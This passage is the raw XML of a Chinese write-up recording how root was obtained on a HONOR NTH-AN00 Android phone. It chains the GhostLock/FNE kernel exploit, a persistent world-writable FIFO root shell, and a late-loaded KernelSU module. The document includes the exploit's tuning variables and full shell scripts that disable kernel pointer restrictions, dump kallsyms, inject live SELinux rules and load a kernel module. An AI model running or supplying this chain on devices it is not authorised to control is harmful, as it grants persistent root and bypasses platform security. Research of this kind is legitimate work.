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eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">HONOR NTH-AN00（nova 8）内核提权</w:t>
      </w:r>
    </w:p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GhostLock / FNE 漏洞链 + KernelSU 晚加载（late-load）完整实现记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">实验日期：2026-10-18    执行方式：adb（USB）    结果：成功获得 uid=0(root)，SELinux 恢复 Enforcing 后 root 仍可用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="4C9A4C" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="EAF3EA" w:val="clear"/>
        <w:spacing w:after="200" w:before="80" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C6E2C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">一句话结论：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="2A2A2A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">先用 GhostLock/FNE 内核内存破坏漏洞在 u:r:kernel:s0 下拿到 uid=0 并关闭 SELinux 强制模式，借此注入一条常驻 root shell 通道；再通过该通道用官方 ksud insmod 把 kernelsu.ko 晚加载进内核，最终由 KernelSU 提供 /system/bin/su 标准提权入口，并把 SELinux 重新切回 Enforcing。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777777"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">图 0  成功现场：右侧手机“关于手机”显示 KernelSU 工作中；左下 cmd 窗口 adb shell 提权结果为 uid=0(root) context=u:r:ksu:s0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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">一、设备与环境信息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以下信息全部来自设备实测（getprop / uname / /proc/modules），未做任何推测。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9000"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:left w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:bottom w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:right w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:insideH w:val="single" w:color="C9D6E4" w:sz="2"/>
          <w:insideV w:val="single" w:color="C9D6E4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b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">实测值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机型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HONOR 50（NTH-AN00），device 代号 HNNTH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Android 版本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Android 14（SDK 34）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系统版本号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NTH-AN00 8.0.0.221(C00E219R5P6)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Build 指纹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HONOR/NTH-AN00/HNNTH:14/HONORNTH-AN00/8.0.0.221C00E219R5P6:user/release-keys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Build 类型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user，ro.debuggable=0（非 userdebug，无 adb root）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内核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Linux 5.4.289-qgki-gf6cb1f712a6e #1 SMP PREEMPT Tue Aug 11 15:27:16 CST 2026 aarch64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SELinux（初始）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Enforcing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adb shell 身份（初始）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uid=2000(shell)，context=u:r:shell:s0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设备内已装应用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com.edge.Jinglian.fneroot、com.ghostlock.app、com.topjohnwu.magisk、io.github.huskydg.magisk、me.weishu.kernelsu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设备内预置工具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/data/local/tmp/ksu_fne/（来自 fneroot 应用 assets：e、kernelsu.ko、ksud、load_ko、magiskpolicy、fne_local.sh、chain_hook.sh）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">关键前提 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">该机型为 user 版、ro.debuggable=0，因此 adb root、adb remount、setprop 等方式全部不可用。唯一可行路径是内核态漏洞利用 —— 这也是整条链的起点。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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">二、攻击链总览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整条链分成四个阶段，每个阶段解决一个具体障碍，缺一不可。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9000"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:left w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:bottom w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:right w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:insideH w:val="single" w:color="C9D6E4" w:sz="2"/>
          <w:insideV w:val="single" w:color="C9D6E4" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="520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b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">阶段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b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">名称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b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">解决的问题 / 产出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GhostLock / FNE 内核漏洞利用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绕过 KASLR 与 SELinux，取得 uid=0 且运行在 u:r:kernel:s0 内核域；同时清零 sig_enforce（内核模块签名校验）、把 SELinux 置为 Permissive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注入常驻 root shell 通道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漏洞进程的 root 上下文是瞬态的（SELinux 恢复 Enforcing 时会被杀），因此先用 FIFO + setsid 循环把 root 权限“搬运”到一条可长期复用的通道上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KernelSU 晚加载（ksud insmod）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通过 S2 的通道，在 root 环境下修复 SELinux 策略、快照 pristine policy，再用官方 ksud insmod 加载 kernelsu.ko（内置 kallsyms 符号解析，避开手工填地址）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验证与收尾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确认 /system/bin/su 可用、KSU 域为 u:r:ksu:s0、模块 Live、root 可写；把 SELinux 切回 Enforcing 并确认 root 依旧可用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1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">三、阶段 S1：GhostLock / FNE 内核漏洞利用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3.1 漏洞本质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该链利用的是内核 pi_waiters 相关的重入缺陷，通过竞态触发对内核内存的破坏，从而在 u:r:kernel:s0 上下文中获得任意代码执行。由于它工作在内核域，具备两个决定性的好处：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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">天然绕过 SELinux —— 内核域本身不受普通域的策略约束，可以直接写 /proc/sys 等敏感节点；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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">可以直接关闭内核模块签名校验（sig_enforce），为后续 insmod 自定义模块（kernelsu.ko）铺路。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">代价 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">这是一条内存破坏型利用，具有概率性：失败时表现为内核 oops → 直接 panic 重启。实测中曾出现过一次设备掉线（panic 重启），属于该利用的已知特性，不是操作失误。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3.2 执行方式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设备端自带本地化运行脚本 fne_local.sh（由 fneroot 应用 assets 提供），它把原 adb 版本改成了纯设备本地执行，避免 adb 往返带来的时序抖动。核心是给利用二进制 e 注入一组 GL_* 环境变量来控制策略：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E="/data/local/tmp/ksu_fne/e"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SYNC="GL_AIM_DM=1 GL_W1_ATTEMPTS=2 GL_ROUTE_ATTEMPTS=1 GL_HOLD_CHAIN=1 \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GL_HOLD_WAITER=1 GL_PUNCH_IN_WINDOW=1 GL_PUNCH_DELAY_USEC=0 \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GL_MCAST_ROUTE=1 GL_PROBE_BOOTID=0 GL_SPRAY_TEST=0 GL_STAMP_SYNC=1"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其中 GL_W1_ATTEMPTS 对应“W1b”这一步（即清零 sig_enforce 的 mode-5 写入），是整条链能否继续的关键门禁。运行前脚本还会做设备安静化（force-stop 相册/搜索服务、kill-all、trim-caches）并静默数秒，以降低竞态窗口内的噪声干扰。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利用成功后，二进制会以 uid=0、u:r:kernel:s0、SELinux Permissive 的身份拉起 chain_hook.sh（通过 setsid 脱离父进程），这是 S2 的入口。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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">四、阶段 S2：注入常驻 root shell 通道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4.1 为什么必须做这一步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chain_hook.sh 是在漏洞利用的“余温”里运行的：此时进程虽是 uid=0，但上下文是 u:r:kernel:s0。这条链的设计中，最后一步会把 SELinux 重新置为 Enforcing —— 而这一动作会顺手杀掉所有 kernel:s0 的进程。也就是说，利用进程本身是“一次性的”。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如果不在被杀之前把权限转移出去，root 就会随进程一起消失，后续所有操作都无从下手。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4.2 通道实现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在 chain_hook.sh 的最前面（id 输出之后、sync 之后）插入了一段 FIFO 通道代码，把 root 权限驻留成一条可反复读写的管道：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rm -f /data/local/tmp/rs.in /data/local/tmp/rs.out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mkfifo /data/local/tmp/rs.in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chmod 666 /data/local/tmp/rs.in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: &gt; /data/local/tmp/rs.out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chmod 666 /data/local/tmp/rs.out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"ROOT SHELL CHANNEL UP uid=$(id -u) ctx=$(cat /proc/self/attr/current)" \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&gt;&gt; /data/local/tmp/rs.out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setsid /system/bin/sh -c 'while true; do /system/bin/sh &lt;/data/local/tmp/rs.in \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  &gt;&gt;/data/local/tmp/rs.out 2&gt;&amp;1; done' &lt;/dev/null &gt;/dev/null 2&gt;&amp;1 &amp;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0 &gt; /proc/sys/kernel/kptr_restrict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cat /proc/kallsyms &gt; /data/local/tmp/real_kallsyms.txt 2&gt;/dev/null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chmod 644 /data/local/tmp/real_kallsyms.txt 2&gt;/dev/null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3B6EA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">设计要点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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">setsid + while true 循环：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">让 shell 脱离控制终端并常驻；每次从 rs.in 读命令、把结果追加写进 rs.out，形成一问一答的持久会话。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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">666 权限：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">让普通 adb shell（uid=2000）也能写入 rs.in / 读取 rs.out，从而不需要反复重新触发漏洞。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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">kptr_restrict=0 + 抓取 kallsyms：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">趁 root 身份把 /proc/kallsyms 全量导出（实测 300873 行），用于后续计算 KASLR slide、比对符号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">实测结果 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">chain.log 中可见通道建立成功的记录：root shell channel pid=27544，并在同一次运行中完成 kallsyms 快照（300873 lines）。此后所有 root 命令都是通过向 rs.in 写脚本、从 rs.out 读结果来完成的。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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">五、阶段 S3：KernelSU 晚加载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5.1 为什么不用手工 load_ko，而改用官方 ksud insmod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设备预置了 load_ko 工具（配合 fake kallsyms 做动态符号解析），但这条路在本机上被证明走不通，原因是符号表与运行内核大面积不一致：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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">fne_syms.txt 是随 APK 附带的静态符号表，而本机每次开机 KASLR 都会重新随机化，静态表里的地址几乎全错；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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">实测统计：约 57154 个符号与真实地址相差 0x30，约 41699 个相差 0x180；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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">更致命的是，厂商已把 commit_creds / prepare_kernel_cred 这类敏感符号从 kallsyms 中过滤掉，手工补地址会让模块跳转到错误位置，直接 panic。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而官方 ksud（3.3.0, uapi: 2）的 insmod 子命令内置了符号解析逻辑，能够基于运行时真实内核自行完成重定位，不需要任何手工地址表。因此 S3 改用 ksud insmod。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">补充说明 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">chain_hook.sh 自身的自动加载路径在本轮并没有成功（chain_status 最终为 slidemismatch），根因是它生成的 fake kallsyms 与真实符号差了 0x30（例如真实 commit_creds=ffffffd0f5cc7fe4，fake=ffffffd0f5cc7fb4）。这也是最终绕过手工加载、改走 ksud 的直接原因。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5.2 加载前的三项准备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在 insmod 之前必须在 root 通道里完成三件事，任何一件缺失都会导致模块 init 阶段失败甚至 panic：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eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">清零 panic_on_oops —— 让模块 init 过程中的任何 oops 变成可观察的日志，而不是直接重启，便于定位问题。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eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">快照 pristine policy —— 从 /sys/fs/selinux/policy 读取原始策略（实测 1612459 字节），作为 kernelsu.ko 的 pristine_policy 参数传入，供模块的 selinux_hide 备份使用。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eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">用 magiskpolicy 注入允许规则 —— 通过 --apply ksu_rules --live 向运行中的 SELinux 策略追加 KernelSU 所需的规则（例如允许 ksu 域的相关操作）。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5.3 加载命令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通过 FIFO 通道投递的脚本（drive_ksud_insmod.sh）内容如下：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D=/data/local/tmp/ksu_fne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export PATH=/system/bin:/data/local/tmp/ksu_fne:$PATH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"uid=$(id -u) enforce=$(getenforce)"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po=$(cat /proc/sys/kernel/panic_on_oops); echo "panic_on_oops=$po -&gt; 0"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0 &gt; /proc/sys/kernel/panic_on_oops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0 &gt; /proc/sys/kernel/kptr_restrict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[ -s $D/pristine_policy ] || cat /sys/fs/selinux/policy &gt; $D/pristine_policy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$D/magiskpolicy --apply $D/ksu_rules --live &gt;/dev/null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"magiskpolicy rc=$?"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"--- ksud insmod ---"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$D/ksud insmod $D/kernelsu.ko \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"allow_shell=1 pristine_policy=$D/pristine_policy" 2&gt;&amp;1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"ksud insmod rc=$?"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5.4 加载结果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ksud insmod 返回 0，kernelsu.ko 完成 init。模块加载后发生了一系列自动动作：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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">自动认领管理器应用 me.weishu.kernelsu（该进程随后以 u0_a249 身份常驻运行）；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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">依次执行 KernelSU 的 post-fs-data / services / boot-completed 三个启动阶段；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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">完成自身安装：写出 /data/adb/ksud 与 /data/adb/ksu/ 目录树，并安装标准 su 入口 /system/bin/su。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实测模块状态：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 grep kernelsu /proc/modules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kernelsu 196608 1 - Live 0xffffffd0e49b3000 (OE)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 ls -l /data/adb/ksu/bin/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bootctl   busybox   ksud -&gt; /data/adb/ksud   resetprop -&gt; /data/adb/ksud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 /data/adb/ksu/bin/ksud --version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ksud 3.3.0 (uapi: 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">注意 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">本版本 KernelSU（3.3.0）在加载后并不会创建 /sys/module/kernelsu/ 目录节点，因此不能再用早期版本那种“读 /sys/module/kernelsu/version”的方式判断模块是否可用。应改用 /proc/modules 中 Live 标志 + 实际 su 提权结果来判定。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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">六、阶段 S4：验证与收尾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验证脚本从六个维度确认 root 是否真正可用，而不是“假 Live”。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9000"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:left w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:bottom w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:right w:val="single" w:color="A6B8CE" w:sz="4"/>
          <w:insideH w:val="single" w:color="C9D6E4" w:sz="2"/>
          <w:insideV w:val="single" w:color="C9D6E4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b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">验证项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b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">实测结果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1) adb shell 原始身份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uid=2000(shell)，context=u:r:shell:s0（普通 shell，未被改动）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2) su 提权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su -c 'id' → uid=0(root) gid=0(root) groups=0(root)，返回码 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3) 提权后的 SELinux 域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context=u:r:ksu:s0（KernelSU 专属域，说明提权走的是 KSU 通道而非残留的 kernel 上下文）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4) 内核模块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kernelsu 196608 1 - Live 0xffffffd0e49b3000 (OE)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5) SELinux 全局状态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Enforcing —— 已经切回强制模式，且 root 仍然可用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6) root 写权限实测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su -c 在 /data/local/tmp/roottest/proof.txt 写入成功，内容 rootwrite，属主 root:root，SELinux 标签 u:object_r:shell_data_file:s0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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其中第 5 项是整条链最能说明问题的证据：SELinux 已恢复 Enforcing，而提权依然成立，说明 root 不是靠 Permissive 模式“漏”出来的，而是由已加载的内核模块（KernelSU）在策略允许下正式提供的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF7E6" w:val="clear"/>
        <w:spacing w:after="120" w:before="120" w:line="300"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8A6100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">关于 su 文件 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/system/bin/su 的属组显示为 u3592_a1632_cache，大小与 ksud 完全一致（4892712 字节），说明它是 KernelSU 安装的标准 su 入口（由 ksud 自身实现的入口逻辑），并非厂商原厂 su。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3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">七、踩过的坑与修复方式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这一节是整份记录中最有价值的部分 —— 失败点几乎全部集中在“符号与行尾”这类不起眼的地方。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7.1 fake kallsyms 行尾 CRLF 导致符号解析为 0/184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现象：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">load_ko 报告 resolved 0/184，grep 也匹配不到任何符号。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根因：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">在 Windows 侧用 PowerShell 的 WriteAllLines 生成 fake kallsyms，默认输出 CRLF 行尾，符号名尾部带了一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Microsoft YaHei" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">\r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，内核模块加载器按精确字符串匹配，自然全部落空。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改用 WriteAllText 并手动拼接 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Microsoft YaHei" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">`n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，强制 LF 行尾。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F4F7" w:val="clear"/>
        <w:spacing w:after="8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[System.IO.File]::WriteAllText("$work\merged_kallsyms.txt", (($out -join "`n") + "`n"))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7.2 符号追加到文件末尾导致有序查找遗漏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现象：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">补全缺失符号后，部分符号依旧解析不到。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根因：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">kallsyms 是有序表，加载器依赖顺序；把缺失符号直接追加到文件末尾，破坏了整体有序性，落在后半段的符号被跳过。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改为按地址升序插入到正确位置，保持文件整体有序（merge2.ps1）。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7.3 符号表与运行内核大面积不一致导致 insmod panic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现象：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">手工 load_ko 第二次执行时，符号解析达到 184/184，但模块 init 阶段内核直接 panic。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根因：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">静态符号表与运行内核地址大面积不一致（57154 个差 0x30、41699 个差 0x180），且厂商已把 commit_creds / prepare_kernel_cred 从 kallsyms 过滤，手工补出的地址是错的，模块一跳就飞。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彻底放弃手工地址表，改用官方 ksud insmod，让 ksud 自己基于运行时真实内核做符号解析与重定位。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7.4 KASLR slide 每次开机都变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现象：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Microsoft YaHei" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">chain_hook.sh 报 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Microsoft YaHei" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">slide mismatch: real commit_creds=ffffffd0c0ec7fe4 fake=ffffffd0c0ec7fb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
